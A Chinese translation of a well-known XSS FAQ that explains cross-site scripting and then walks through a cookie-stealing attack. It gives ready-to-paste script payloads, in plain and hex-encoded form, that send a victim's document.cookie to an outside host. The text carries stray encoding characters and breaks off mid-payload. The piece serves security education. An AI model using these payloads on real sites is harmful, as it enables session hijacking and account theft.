該文章簡(jiǎn)單地介紹了XSS的基礎(chǔ)知識(shí)及其危害和預(yù)防方法���。Web開發(fā)人員的必讀。譯自 http://www.cgisecurity.com/articles/xss-faq.shtml�����。
簡(jiǎn)介
現(xiàn)在的網(wǎng)站包含大量的動(dòng)態(tài)內(nèi)容以提高用戶體驗(yàn),比過(guò)去要復(fù)雜得多����。所謂動(dòng)態(tài)內(nèi)容,就是根據(jù)用戶環(huán)境和需要����,Web應(yīng)用程序能夠輸出相應(yīng)的內(nèi)容。動(dòng)態(tài)站點(diǎn)會(huì)受到一種名為“跨站腳本攻擊”(Cross Site Scripting, 安全專家們通常將其所寫成 XSS)的威脅����,而靜態(tài)站點(diǎn)則完全不受其影響。這篇FAQ將使你能更深入地理解這種威脅����,并給出如何檢測(cè)并防止的建議�。
什么是跨站腳本攻擊?
跨站腳本攻擊(也稱為XSS)指利用網(wǎng)站漏洞從用戶那里惡意盜取信息��。用戶在瀏覽網(wǎng)站、使用即時(shí)通訊軟件�、甚至在閱讀電子郵件時(shí),通常會(huì)點(diǎn)擊其中的鏈接�。攻擊者通過(guò)在鏈接中插入惡意代碼,就能夠盜取用戶信息�����。攻擊者通常會(huì)用十六進(jìn)制(或其他編碼方式)將鏈接編碼��,以免用戶懷疑它的合法性�。網(wǎng)站在接收到包含惡意代碼的請(qǐng)求之后會(huì)產(chǎn)成一個(gè)包含惡意代碼的頁(yè)面,而這個(gè)頁(yè)面看起來(lái)就像是那個(gè)網(wǎng)站應(yīng)當(dāng)生成的合法頁(yè)面一樣�。許多流行的留言本和論壇程序允許用戶發(fā)表包含HTML和javascript的帖子。假設(shè)用戶甲發(fā)表了一篇包含惡意腳本的帖子����,那么用戶乙在瀏覽這篇帖子時(shí),惡意腳本就會(huì)執(zhí)行��,盜取用戶乙的session信息�����。有關(guān)攻擊方法的詳細(xì)情況將在下面闡述�����。
XSS和CSS是什么意思?
人們經(jīng)常將跨站腳本攻擊(Cross Site Scripting)縮寫為CSS����,但這會(huì)與層疊樣式表(Cascading Style Sheets, CSS)的縮寫混淆。因此有人將跨站腳本攻擊縮寫為XSS�。如果你聽到有人說(shuō) “我發(fā)現(xiàn)了一個(gè)XSS漏洞”,顯然他是在說(shuō)跨站腳本攻擊���。
跨站腳本攻擊有什么危害����?
為了搜集用戶信息��,攻擊者通常會(huì)在有漏洞的程序中插入 JavaScript����、VBScript、 ActiveX或Flash以欺騙用戶(詳見下文)��。一旦得手��,他們可以盜取用戶帳戶����,修改用戶設(shè)置,盜取/污染cookie����,做虛假?gòu)V告等。每天都有大量的XSS攻擊的惡意代碼出現(xiàn)��。 Brett Moore的下面這篇文章詳細(xì)地闡述了“拒絕服務(wù)攻擊”以及用戶僅僅閱讀一篇文章就會(huì)受到的“自動(dòng)攻擊”�����。
能否給出幾個(gè)跨站腳本攻擊的例子�?
著名的PHPnuke程序有很多XSS漏洞。由于該程序十分流行�����,因此經(jīng)常被黑客們作為XSS的攻擊對(duì)象進(jìn)行檢查�。下面給出了幾個(gè)已公開報(bào)告的攻擊方法。
能否解釋一下XSS cookie盜竊是什么意思����?
根據(jù)作為攻擊對(duì)象的Web程序,下面某些變量和插入位置可能需要進(jìn)行調(diào)整��。要注意這只是攻擊方法的一個(gè)例子。在這個(gè)例子中�����,我們將利用腳本“a.php”中的 “viriable”變量中的跨站腳本漏洞�����,通過(guò)正常請(qǐng)求進(jìn)行攻擊�����。這是跨站腳本攻擊最常見的形式����。
第一步: 鎖定目標(biāo)
當(dāng)你找到某個(gè)Web程序存在XSS漏洞之后,檢查一下它是否設(shè)置了cookie����。如果在該網(wǎng)站的任何地方設(shè)置了cookie,那么就可以從用戶那里盜取它�。
第二步: 測(cè)試
不同的攻擊方式將產(chǎn)生不同的XSS漏洞,所以應(yīng)適當(dāng)進(jìn)行測(cè)試以使得輸出結(jié)果看起來(lái)像是正常的����。某些惡意腳本插入之后會(huì)破壞輸出的頁(yè)面����。(為欺騙用戶��,輸出結(jié)果非常重要���,因此攻擊者有必要調(diào)整攻擊代碼使輸出看起來(lái)正常。)
下一步你需要在鏈接至包含XSS漏洞的頁(yè)面的URL中插入 Javascript(或其他客戶端腳本)����。下面列出了一些經(jīng)常用于測(cè)試XSS漏洞的鏈接。當(dāng)用戶點(diǎn)擊這些鏈接時(shí)�,用戶的cookie獎(jiǎng)被發(fā)送到 www.cgisecurity.com/cgi-bin/cookie.cgi 并被顯示。如果你看到顯示結(jié)果中包含了cookie信息����,說(shuō)明可能可以劫持該用戶的賬戶。
盜取Cookie的Javascript示例����。使用方法如下。
ASCII用法
http://host/a.php?variable="><script>document.location=‘http://www.cgisecurity.com/cgi-bin/cookie.cgi? ‘%20+document.cookie</script>
十六進(jìn)制用法
http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67
%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f
%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
注意: 每種用法都先寫為ASCII���,再寫成十六進(jìn)制以便復(fù)制粘貼��。
1. "><script>document.location=‘http://www.cgisecurity.com/cgi-bin/cookie.cgi?‘ +document.cookie</script>
HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e
%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65
%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f
%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
2. <script>document.location=‘http://www.cgisecurity.com/cgi-bin/cookie.cgi?‘ +document.cookie</script>
HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72
%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b
%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3
